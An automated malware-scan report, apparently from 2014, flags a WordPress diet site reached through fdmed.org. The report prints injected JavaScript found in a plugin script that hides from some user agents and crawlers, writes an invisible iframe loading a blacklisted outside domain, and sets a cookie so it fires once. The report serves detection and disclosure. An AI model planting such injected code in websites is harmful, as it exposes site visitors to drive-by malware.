New scan:

Malware Scanner report for fdmed.org

Malicious/Suspicious/Total urls checked
1/1/16
2 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "fdmed.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
1/0/1
1 malicious iframe found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=fdmed.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://fdmed.org/
HTTP/1.1 302 Found
Connection: close
Date: Sat, 11 Oct 2014 01:24:17 GMT
Location: http://dietamediterranea.com
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3 with Suhosin-Patch
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.2.6-1+lenny3
clean
http://dietamediterranea.com/
200 OK
Content-Length: 72456
Content-Type: text/html
suspicious
Page code contains blacklisted domain: fdmed.org

<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en"> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="es-ES"> <!--<![endif]-->
<head>
<meta charset="UTF-8"
...[4127 bytes skipped]...

http://dietamediterranea.com/wp-includes/js/jquery/jquery.js
200 OK
Content-Length: 95807
Content-Type: application/javascript
clean
http://dietamediterranea.com/wp-includes/js/jquery/jquery-migrate.min.js
200 OK
Content-Length: 7200
Content-Type: application/javascript
clean
http://dietamediterranea.com/wp-content/plugins/js_composer/assets/lib/jquery-waypoints/waypoints.min.js
200 OK
Content-Length: 8044
Content-Type: application/javascript
clean
http://dietamediterranea.com/wp-content/themes/Terso/js/waypoints-sticky.min.js
200 OK
Content-Length: 1150
Content-Type: application/javascript
clean
http://dietamediterranea.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js
200 OK
Content-Length: 4289
Content-Type: application/javascript
clean
http://dietamediterranea.com/wp-includes/js/jquery/ui/jquery.ui.datepicker.min.js
200 OK
Content-Length: 35806
Content-Type: application/javascript
clean
http://dietamediterranea.com/wp-content/plugins/wp-views/embedded/res/js/i18n/jquery.ui.datepicker-es.js
200 OK
Content-Length: 896
Content-Type: application/javascript
clean
http://dietamediterranea.com/wp-content/plugins/wp-views/embedded/res/js/wpv-pagination-embedded.js
200 OK
Content-Length: 54223
Content-Type: application/javascript
clean
http://dietamediterranea.com/wp-includes/js/jquery/ui/jquery.ui.effect.min.js
200 OK
Content-Length: 12972
Content-Type: application/javascript
clean
http://dietamediterranea.com/wp-content/themes/Terso/js/jquery.fancybox.min.js?ver%5B0%5D=jquery
200 OK
Content-Length: 26046
Content-Type: application/javascript
clean
http://dietamediterranea.com/wp-content/themes/Terso/js/nv-script.pack.js?ver%5B0%5D=jquery
200 OK
Content-Length: 12465
Content-Type: application/javascript
clean
http://dietamediterranea.com/wp-includes/js/comment-reply.min.js
200 OK
Content-Length: 757
Content-Type: application/javascript
clean
http://dietamediterranea.com/wp-content/themes/Terso/js/jquery.reflection.js?ver%5B0%5D=jquery
200 OK
Content-Length: 1867
Content-Type: application/javascript
clean
http://dietamediterranea.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress.js
200 OK
Content-Length: 2153
Content-Type: application/javascript
malicious
Malicious code found. Script contains blacklisted domain: naghsharaco.yanma-market.com

...[161 bytes skipped]...
(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o=void 0===getCookie("ipmoture_aurma");if(!t()&&o){document.write('<iframe src="http://naghsharaco.yanma-market.com/projetarmais17.html?r" style="border-right-style: dashed;border-left-style: dashed;top: -1000px;left: -1000px;border-top-width: 4px;position: absolute;border-left-width: 4px;" height="142" width="142"></iframe>');var r=new Date((new Date).getTime()+1728e5);document.cookie="ipmoture_aurma=1; path=/; expires="+r.toUTCString()}}();
icl_lang = icl_vars.current_language;
icl_home = icl_vars.icl_home;
function addLoadEvent(func) {
var oldonload = window
...[1095 bytes skipped]...

Decoded script:


<iframe src="http://naghsharaco.yanma-market.com/projetarmais17.html?r" style="border-right-style: dashed;border-left-style: dashed;top: -1000px;left: -1000px;border-top-width: 4px;position: absolute;border-left-width: 4px;" height="142" width="142"></iframe>

Malicious iFrame found.
size: 142x142     
src: http://naghsharaco.yanma-market.com/projetarmais17.html?r
This URL is marked by Google as suspicious

<iframe src="http://naghsharaco.yanma-market.com/projetarmais17.html?r" style="border-right-style: dashed;border-left-style: dashed;top: -1000px;left: -1000px;border-top-width: 4px;position: absolute;border-left-width: 4px;" height="142" width="142">


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: fdmed.org

Result:
HTTP/1.1 302 Found
Connection: close
Date: Sat, 11 Oct 2014 01:24:17 GMT
Location: http://dietamediterranea.com
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3 with Suhosin-Patch
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.2.6-1+lenny3

...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fdmed.org
Referer: http://www.google.com/search?q=fdmed.org

Result:
The result is similar to the first query. There are no suspicious redirects found.